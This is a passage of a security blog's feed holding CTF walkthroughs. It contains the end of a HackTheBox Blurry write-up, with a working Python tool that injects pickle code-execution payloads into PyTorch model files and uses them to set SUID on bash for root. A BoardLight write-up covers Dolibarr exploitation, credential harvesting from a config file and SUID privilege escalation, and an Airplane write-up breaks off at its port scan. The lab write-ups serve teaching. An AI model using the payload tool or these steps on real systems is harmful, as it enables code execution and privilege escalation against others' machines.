&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">__reduce__&lt;/span>(self):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> self&lt;span style="color:#fe8019">.&lt;/span>command, (self&lt;span style="color:#fe8019">.&lt;/span>args,{})
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser &lt;span style="color:#fe8019">=&lt;/span> argparse&lt;span style="color:#fe8019">.&lt;/span>ArgumentParser(description&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;PyTorch Pickle Inject&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_argument(&lt;span style="color:#b8bb26">&amp;#34;model&amp;#34;&lt;/span>, &lt;span style="color:#fabd2f">type&lt;/span>&lt;span style="color:#fe8019">=&lt;/span>Path)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_argument(&lt;span style="color:#b8bb26">&amp;#34;command&amp;#34;&lt;/span>, choices&lt;span style="color:#fe8019">=&lt;/span>[&lt;span style="color:#b8bb26">&amp;#34;system&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;exec&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;eval&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;runpy&amp;#34;&lt;/span>])
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_argument(&lt;span style="color:#b8bb26">&amp;#34;args&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_argument(&lt;span style="color:#b8bb26">&amp;#34;-v&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;--verbose&amp;#34;&lt;/span>, help&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;verbose logging&amp;#34;&lt;/span>, action&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;count&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>args &lt;span style="color:#fe8019">=&lt;/span> parser&lt;span style="color:#fe8019">.&lt;/span>parse_args()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>command_args &lt;span style="color:#fe8019">=&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>args
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># If the command arg is a path, read the file contents&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> os&lt;span style="color:#fe8019">.&lt;/span>path&lt;span style="color:#fe8019">.&lt;/span>isfile(command_args):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">with&lt;/span> &lt;span style="color:#fabd2f">open&lt;/span>(command_args, &lt;span style="color:#b8bb26">&amp;#34;r&amp;#34;&lt;/span>) &lt;span style="color:#fe8019">as&lt;/span> in_file:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> command_args &lt;span style="color:#fe8019">=&lt;/span> in_file&lt;span style="color:#fe8019">.&lt;/span>read()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Construct payload&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>command &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;system&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> PickleInject&lt;span style="color:#fe8019">.&lt;/span>System(command_args)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">elif&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>command &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;exec&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> PickleInject&lt;span style="color:#fe8019">.&lt;/span>Exec(command_args)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">elif&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>command &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;eval&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> PickleInject&lt;span style="color:#fe8019">.&lt;/span>Eval(command_args)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">elif&lt;/span> args&lt;span style="color:#fe8019">.&lt;/span>command &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;runpy&amp;#34;&lt;/span>:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> payload &lt;span style="color:#fe8019">=&lt;/span> PickleInject&lt;span style="color:#fe8019">.&lt;/span>RunPy(command_args)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Backup the model&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>backup_path &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">{}&lt;/span>&lt;span style="color:#b8bb26">.bak&amp;#34;&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>format(args&lt;span style="color:#fe8019">.&lt;/span>model)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>shutil&lt;span style="color:#fe8019">.&lt;/span>copyfile(args&lt;span style="color:#fe8019">.&lt;/span>model, backup_path)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Save the model with the injected payload&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>torch&lt;span style="color:#fe8019">.&lt;/span>save(torch&lt;span style="color:#fe8019">.&lt;/span>load(args&lt;span style="color:#fe8019">.&lt;/span>model), f&lt;span style="color:#fe8019">=&lt;/span>args&lt;span style="color:#fe8019">.&lt;/span>model, pickle_module&lt;span style="color:#fe8019">=&lt;/span>PickleInject([payload]))
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Copy the code to the &lt;code>/tmp/&lt;/code> folder.
Now we have to make a copy of &lt;code>/models/demo_model.pth&lt;/code> file to &lt;code>/tmp&lt;/code> and use the script to inject code.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">cd&lt;/span> /tmp
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>cp /models/demo_model.pth .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>python3 main.py ./demo_model.pth system &lt;span style="color:#b8bb26">&amp;#39;chmod u+s /bin/bash&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>This will modify the original model that now executes &lt;code>chmod u+s /bin/bash&lt;/code> and also create a backup of the original file.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013161804.webp" alt="">
Now we just have to move this updated model into &lt;code>/models/&lt;/code> and run it with &lt;code>/usr/bin/evaluate_model&lt;/code> command.
&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013162052.webp" alt="">
Since there&amp;rsquo;s an &lt;code>*&lt;/code> in the path, we don&amp;rsquo;t exactly need to move the updated model into the &lt;code>/models/&lt;/code> directory.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>sudo /usr/bin/evaluate_model /models/../tmp/demo_model.pth
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013162253.webp" alt="">
And we are root.&lt;/p>
&lt;p>This machine mainly focuses on addressing security aspects essential for maintaining robust MLOps practices.
We explored the exploitation of a remote code execution vulnerability (CVE-2024-24590) in ClearML through malicious artifact uploads. By leveraging the insecure deserialization of pickle files, we demonstrated how an attacker could execute arbitrary code on a victim&amp;rsquo;s system. We also discussed the privilege escalation technique, using a crafted PyTorch model to gain root access.&lt;/p>
&lt;h3 id="references">References:&lt;/h3>
&lt;ul>
&lt;li>&lt;a href="https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/">Machine Learning Operations: What You Need to Know Now - HiddenLayer&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/">Python Serialization Vulnerabilities – Pickle&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://intoli.com/blog/dangerous-pickles/">Dangerous Pickles — Malicious Python Serialization&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/">Weaponizing ML Models with Ransomware&lt;/a>&lt;/li>
&lt;/ul></content></item><item><title>BoardLight | HackTheBox</title><link>https://h4r1337.github.io/posts/board-light/</link><pubDate>Sat, 28 Sep 2024 22:01:42 +0530</pubDate><guid>https://h4r1337.github.io/posts/board-light/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/boardlight/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/BoardLight">BoardLight&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/116842">&lt;img src="https://www.hackthebox.com/badge/image/116842" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About BoardLight
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>BoardLight is an easy difficulty Linux machine that features a &lt;code>Dolibarr&lt;/code> instance vulnerable to &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-30253">CVE-2023-30253&lt;/a>. This vulnerability is leveraged to gain access as &lt;code>www-data&lt;/code>. After enumerating and dumping the web configuration file contents, plaintext credentials lead to &lt;code>SSH&lt;/code> access to the machine. Enumerating the system, a &lt;code>SUID&lt;/code> binary related to &lt;code>enlightenment&lt;/code> is identified which is vulnerable to privilege escalation via &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-37706">CVE-2022-37706&lt;/a> and can be abused to leverage a root shell.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/boardlight/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/BoardLight">BoardLight&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/116842">&lt;img src="https://www.hackthebox.com/badge/image/116842" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About BoardLight
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>BoardLight is an easy difficulty Linux machine that features a &lt;code>Dolibarr&lt;/code> instance vulnerable to &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-30253">CVE-2023-30253&lt;/a>. This vulnerability is leveraged to gain access as &lt;code>www-data&lt;/code>. After enumerating and dumping the web configuration file contents, plaintext credentials lead to &lt;code>SSH&lt;/code> access to the machine. Enumerating the system, a &lt;code>SUID&lt;/code> binary related to &lt;code>enlightenment&lt;/code> is identified which is vulnerable to privilege escalation via &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2022-37706">CVE-2022-37706&lt;/a> and can be abused to leverage a root shell.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -p- -vv -Pn -T4 --min-rate &lt;span style="color:#d3869b">1000&lt;/span> -oA nmap/ports 10.10.11.11
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> 10.10.11.11
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received user-set &lt;span style="color:#fe8019">(&lt;/span>0.15s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-05-28 11:16:43 IST &lt;span style="color:#fe8019">for&lt;/span> 82s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">65107&lt;/span> closed ports, &lt;span style="color:#d3869b">426&lt;/span> filtered ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Reason: &lt;span style="color:#d3869b">65107&lt;/span> conn-refused and &lt;span style="color:#d3869b">426&lt;/span> no-responses
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>nmap -p22,80 -sC -sV -vv -Pn -T4 --min-rate &lt;span style="color:#d3869b">1000&lt;/span> -oA nmap/services 10.10.11.11
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> board.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.11&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received user-set &lt;span style="color:#fe8019">(&lt;/span>0.27s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-05-28 11:23:23 IST &lt;span style="color:#fe8019">for&lt;/span> 14s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack Apache httpd 2.4.41 &lt;span style="color:#fe8019">((&lt;/span>Ubuntu&lt;span style="color:#fe8019">))&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD POST OPTIONS
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Apache/2.4.41 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Site doesn&amp;#39;t have a title &lt;span style="color:#fe8019">(&lt;/span>text/html; charset&lt;span style="color:#fe8019">=&lt;/span>UTF-8&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="port-80---http-apache-2441">Port 80 - HTTP (Apache &lt;code>2.4.41&lt;/code>)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528112158.webp" alt="">&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528114524.webp" alt="">&lt;p>I couldn&amp;rsquo;t find nothing from these endpoints and the &lt;code>contact.php&lt;/code> is not even sending
any data.
After that I decided to start VHOST Enumeration using Ffuf:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ffuf -u http://board.htb/ -H &lt;span style="color:#b8bb26">&amp;#39;Host: FUZZ.board.htb&amp;#39;&lt;/span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs &lt;span style="color:#d3869b">15949&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528120726.webp" alt="">&lt;h2 id="crmboardcom---dolibarr-1700">crm.board.com - &lt;code>Dolibarr 17.0.0&lt;/code>&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528120841.webp" alt="">&lt;p>Found one valid domain that runs &lt;code>Dolibarr 17.0.0&lt;/code>&lt;/p>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="cve-2023-30253">&lt;code>CVE-2023-30253&lt;/code>&lt;/h2>
&lt;p>Found an exploit for Dolibarr 17.0.0: &lt;a href="https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253">https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253&lt;/a>
To run this exploit we need a working username and password. After some googling, found &lt;code>admin:admin&lt;/code> as the default
credentials. And it is working in the target.
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528122837.webp" alt="">
And we got the reverse shell.
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528122905.webp" alt="">&lt;/p>
&lt;h1 id="lateral-movement-to-user">Lateral Movement to user&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>cat /etc/passwd | grep bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528124721.webp" alt="">&lt;p>Found user &lt;code>larissa&lt;/code>&lt;/p>
&lt;p>Also inside the &lt;code>conf.php&lt;/code> file located in &lt;code>/html/crm.board.htb/htdocs/conf&lt;/code> found a password that can be used to SSH login as larissa into the system&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>cat conf.php | grep -v &lt;span style="color:#b8bb26">&amp;#39;^//&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528124918.webp" alt="">&lt;h2 id="lateral-movement---ssh-larissa">Lateral Movement - SSH larissa&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528125144.webp" alt="">&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration-1">Local Enumeration&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>find / -perm -4000 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528141632.webp" alt="">&lt;h2 id="privilege-escalation---cve-2022-37706">Privilege Escalation - &lt;code>CVE-2022-37706&lt;/code>&lt;/h2>
&lt;blockquote>
&lt;p>The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring&lt;/p>
&lt;/blockquote>
&lt;p>After running this &lt;a href="https://www.exploit-db.com/exploits/51180">exploit&lt;/a>, we were able to
escalate privilege as root user.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boardlight/Pasted%20image%2020240528141745.webp" alt="">&lt;p>Here is the &lt;a href="https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit">writeup&lt;/a> of
the exploit by the author.&lt;/p>
&lt;hr>
&lt;h1 id="resources">Resources&lt;/h1>
&lt;ul>
&lt;li>&lt;a href="https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253">CVE-2023-30253&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.exploit-db.com/exploits/51180">CVE-2022-37706 Exploit&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit">CVE-2022-37706 Writeup&lt;/a>&lt;/li>
&lt;/ul></content></item><item><title>Airplane | TryHackMe</title><link>https://h4r1337.github.io/posts/airplane/</link><pubDate>Mon, 29 Jul 2024 19:14:03 +0530</pubDate><guid>https://h4r1337.github.io/posts/airplane/</guid><description>&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Airplane
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Airplane is a medium level linux box. In this box you will use a path traversal bug to collect information from &lt;code>/proc&lt;/code> directory about a gdbserver. We will get initial access into the box as user &lt;code>hudson&lt;/code> by exploiting the gdb remote debugging server. From there it is a relatively easy privilege escalation by exploiting a suid in &lt;code>find&lt;/code> command to escalate as user &lt;code>carlos&lt;/code> and from there into exploiting a wildcard entry in sudoers.&lt;/p></description><content>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Airplane
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Airplane is a medium level linux box. In this box you will use a path traversal bug to collect information from &lt;code>/proc&lt;/code> directory about a gdbserver. We will get initial access into the box as user &lt;code>hudson&lt;/code> by exploiting the gdb remote debugging server. From there it is a relatively easy privilege escalation by exploiting a suid in &lt;code>find&lt;/code> command to escalate as user &lt;code>carlos&lt;/code> and from there into exploiting a wildcard entry in sudoers.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>rustscan -a 10.10.121.174
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &lt;span style="color:#fe8019">{}&lt;/span> &lt;span style="color:#fe8019">}&lt;/span>| &lt;span style="color:#fe8019">{&lt;/span> &lt;span style="color:#fe8019">}&lt;/span> |&lt;span style="color:#fe8019">{&lt;/span> &lt;span style="color:#fe8019">{&lt;/span>__ &lt;span style="color:#fe8019">{&lt;/span>_ _&lt;span style="color:#fe8019">}{&lt;/span> &lt;span style="color:#fe8019">{&lt;/span>__ / ___&lt;span style="color:#fe8019">}&lt;/span> / &lt;span style="color:#fe8019">{}&lt;/span> &lt;span style="color:#b8bb26">\ &lt;/span>| &lt;span style="color:#b8bb26">`&lt;/span>| |
